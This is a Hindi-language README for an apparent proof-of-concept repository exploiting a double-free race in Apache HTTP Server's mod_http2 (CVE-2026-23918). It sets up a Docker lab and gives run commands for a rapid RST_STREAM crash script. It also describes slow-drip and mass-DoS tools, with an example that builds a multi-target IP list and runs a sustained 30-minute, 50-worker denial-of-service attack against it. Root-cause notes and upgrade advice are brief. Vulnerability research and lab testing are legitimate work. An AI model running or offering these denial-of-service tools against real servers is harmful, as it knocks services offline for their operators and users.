
Apache HTTP/2 डबल-फ्री भेद्यता PoC (CVE-2026-23918)
CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | 2.4.67 में ठीक किया गया
mod_http2 (h2_mplx.c) में एक double-free भेद्यता दूरस्थ हमलावरों को तीव्र RST_STREAM फ्रेम्स के माध्यम से सेवा से वंचित (worker crash) करने की अनुमति देती है, जो c1c2_stream_joined() और m_stream_cleanup() के बीच race condition को ट्रिगर करते हैं।
# 1. Start the lab
docker-compose up --build -d
# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443
# 3. Watch the crash
docker logs -f apache-lab
# 4. Clean up
docker-compose down -v
परिणाम: सर्वर ~30s–3min में
SIGSEGVके साथ क्रैश होता है — विश्वसनीय DoS की पुष्टि हुई।
| फ़ाइल | विवरण |
|---|---|
poc.py | Rapid-RST — तेज़ हमला, 30s–3min में सर्वर क्रैश करता है |
exploits/slow-drip.py | Slow Drip — कम-बैंडविड्थ निरंतर हमला |
exploits/mass-dos.py | Mass DoS — बहु-लक्ष्य निरंतर DoS |
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt
# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7
भेद्यता तब ट्रिगर होती है जब:
c1c2_stream_joined() और m_stream_cleanup() दोनों द्वारा एक साथ जोड़ा जाता हैm->spurge में जोड़ते हैंh2_purge_then_destroy() स्ट्रीम को दो बार नष्ट करता है → double-free → segfault
Apache 2.4.67 या बाद के संस्करण में अपग्रेड करें।
पूर्ण भेद्यता विश्लेषण, रूट कॉज़ वॉकथ्रू, एक्सप्लॉइटेशन नोट्स, और निवारण मार्गदर्शन: → rhasan.com/CVE-2026-23918
⭐ इस रिपॉजिटरी को स्टार करें यदि आपको यह उपयोगी लगा!